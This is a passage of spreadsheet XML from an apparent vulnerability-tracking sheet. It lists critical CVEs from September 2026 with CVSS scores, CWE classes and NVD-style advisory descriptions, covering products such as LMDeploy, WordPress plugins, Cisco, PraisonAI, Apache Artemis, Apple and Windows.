      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>LMDeploy is a toolkit for compressing, deploying, and serving large language models. Starting in version 0.9.1 and prior to version 0.10.2, the LMdeploy implements an rpc server (AsyncRPCServer in zmq_rpc.py) for supporting the RPC communications. In its core functionality call_and_response(), I found it will directly use the pickles.loads() to deserialize the received messages without any sanitization, hence resulting in a remote code execution vulnerability by this RPC server. Version 0.10.2 contains a patch.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-59953</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12793</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder — Dynamic Blocks Form Builder plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.6.2. This is due to the plugin not validating that a submitted form ID belongs to a JetFormBuilder form before parsing the referenced post's content as form schema and executing an Advanced Validation server-side callback. This makes it possible for unauthenticated attackers to create a new administrator-level user account.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12793</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14349</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>The TrueBooker – Appointment Booking and Scheduler System plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.2.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to modify the email address of arbitrary user accounts, including administrators, which can be leveraged to reset the account's password and gain access to it.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14349</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20242</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the External Database Access feature of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to execute arbitrary commands as&amp;nbsp;root on an affected device.
This vulnerability is due to insecure deserialization of a user-supplied Java byte stream from a host that is configured in the external database access list. An attacker could exploit this vulnerability by sending a crafted, serialized Java byte stream to a specific TCP port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the device and elevate privileges to root.
Notes:
This vulnerability can be exploited only by an attacker who has control of a host in the external database access list.
If the FMC management interface does not have public internet access, the attack surface that is associated with this vulnerability is reduced.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20242</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20326</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20326 are related to missing authentication for critical function issues that are grouped under the Common Weakness Enumeration (CWE) CWE-306.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20326</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27546</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can exploit an authentication bypass in the _account_log function to log in as an admin, even when accounts are properly configured.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27546</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27565</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can upload a malicious IODD file that places and executes a shell script with root privileges. The shell script remains active even after a reboot.</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27565</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54334</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>UEFI Firmware Parser parses BIOS, Intel ME, and UEFI firmware structures including volumes, file systems, and files. Prior to 1.14, ReadCLen() in uefi_firmware/compression/Tiano/Decompress.c reads Number from GetBits(Sd, CBIT) with CBIT = 9 and can obtain 511 entries for the 510-element Sd-&gt;mCLen heap array because its loop does not enforce Index &lt; NC. The CharC == 2 run-length path can additionally request up to 531 zero writes through Sd-&gt;mCLen[Index++] = 0. The normal CompressedSection.process() to efi_compressor.TianoDecompress() to TianoDecompress() to DecodeC() to ReadCLen() parsing path therefore permits crafted Tiano or EFI compressed firmware to corrupt heap memory, deterministically crash the parsing process, and potentially execute code depending on build and runtime details. This issue is fixed in version 1.14.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54334</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57127</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-306</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.58, recipe serve installs APIKeyAuthMiddleware or JWTAuthMiddleware when an operator selects api-key or JWT authentication, but each middleware forwards requests when PRAISONAI_API_KEY or PRAISONAI_JWT_SECRET and the corresponding recipe value are absent. Unauthenticated clients can then reach recipe execution, input, and output surfaces and may trigger connected tools despite the operator explicitly enabling authentication. This issue is fixed in 4.6.58.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57127</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57131</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862, CWE-94</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.58, praisonai.jobs.server.create_app mounts praisonai.jobs.router.create_router under /api/v1/runs without authentication or per-job authorization. Network clients can submit attacker-controlled prompts and agent configuration, list and read jobs, stream results, and cancel or delete other jobs, exposing service credentials and connected tool capabilities to unauthorized agent execution. This vulnerability is fixed in 4.6.58.</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57131</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57967</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can craft a CORE protocol SESSION_REATTACH packet to steal an existing session and assume ongoing execution of the previously authenticated session.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57967</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65414</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. A remote attacker may be able to cause unexpected app termination or arbitrary code execution.</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65414</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66302</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34"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34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35"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35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K36"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36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K37"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37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78573</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
